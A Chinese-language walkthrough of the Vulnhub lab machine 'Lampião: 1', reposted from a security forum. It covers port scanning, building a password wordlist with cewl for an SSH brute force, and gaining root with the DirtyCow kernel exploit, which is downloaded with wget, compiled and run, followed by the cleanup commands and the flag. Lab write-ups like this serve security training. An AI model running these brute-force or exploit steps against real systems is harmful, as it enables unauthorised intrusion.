作者:0aKarmA@D0g3,本文转自先知社区,未经许可禁止转载

记录一下自己的Vulnhub-Lampião: 1 通关过程

背景

你想继续攻击自己的实验室吗?试试这个全新的易受攻击机器!“Lampião1”。

Goal:得到root权限

Difficulty:easy

Lampião1是一个巴西著名的土匪领袖,flag里面有他的肖像。

信息收集

首先用netdiscover确定靶机ip,再用nmap扫下端口

一开始用下面这条命令是扫不出1898端口的(这也是我一开始卡着不知道怎么往下走的原因)
nmap -A 192.168.88.112
用下面这条才能扫出来
nmap -n -v -Pn -p- -A --reason -oN nmap.txt 192.168.11.131

-n (不用域名解析); -V (打印版本信息);-Pn (不检测主机存活);--reason (显示端口处于带确认状态的原因);-oN (将标准输出直接写入指定的文件) ;-p- (应该是全部端口都扫一遍)

22是ssh端口,那就先按照惯例,看看80端口吧。

就一个字符画,有个fi duma egud?不晓得什么意思~~

Durpal

既然80端口没有什么收获,那就来1898端口瞧瞧,看到是Drupal,那就先常规思路走一波

Getshell

网上的都是drupal 7.x 利用PHP filter模块去getshell,但是这里登陆模块似乎用不了?因为注册时激活邮件发不出去,没办法激活,所以这条路看来是走不通了。

SSH爆破

这不是一个纯英文的网站,会不会有可能网站里面的英文是密码提示??可不可以做个字典爆破一波?

Cewl了解一下,

默认文章肯定不会有tips,那就弄另一篇生成个字典看看

# cewl -w dict.txt http://192.168.11.131:1898/?q=node/1

仔细观察,发现还有两个作者(username??),试试呗~

# echo tiago > usernames.txt
# echo eder >> usernames.txt

爆破工具hydra了解一下……

-t 速度,-e nsr就是把用户名密码换着来爆破

既然搞到账号密码了,赶紧连进去呗。

一个低权限,那就查查内核什么的,看看怎么提权

tiago@lampiao:~$ uname -a
Linux lampiao 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux
tiago@lampiao:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 14.04.5 LTS
Release:    14.04
Codename:   trusty

用一个脚本看看现成的exp有哪些

$ wget -q -O /tmp/linux-exploit-suggester.sh https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
$ chmod +x /tmp/linux-exploit-suggester.sh
$ /tmp/linux-exploit-suggester.sh
...
[+] [CVE-2016-5195] dirtycow 2

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Tags: debian=7|8,RHEL=5|6|7,[ ubuntu=14.04|12.04 ],ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847.cpp
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

dirtycow走你~

$ wget -q -O /tmp/40847.cpp https://www.exploit-db.com/download/40847.cpp
$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
$ ./dcow -s
Running ...
Password overridden to: dirtyCowFun

Received su prompt (Password: )

root@lampiao:~# echo 0 > /proc/sys/vm/dirty_writeback_centisecs
root@lampiao:~# cp /tmp/.ssh_bak /etc/passwd
root@lampiao:~# rm /tmp/.ssh_bak
root@lampiao:~# 

Root权限到手~

root@lampiao:~# cat flag.txt 
9740616875908d91ddcdaa8aea3af366

flag里面这一串是什么鬼~

在80端口的根目录发现一个lampiao.jpg

网页上打不开,scp到本地发现下面这幅图

网页上打不开难道是做过手脚?md5不能解密,那就看看这个图是不是flag

root@lampiao:/var/www/html# md5sum lampiao.jpg 
9740616875908d91ddcdaa8aea3af366  lampiao.jpg

好吧,还真是~著名的Lampião!

总结

  1. 条条大路通罗马,套路一定要骚!骚!骚!
  2. ssh爆破中的cewl和hydra工具的使用
  3. 提权的基本操作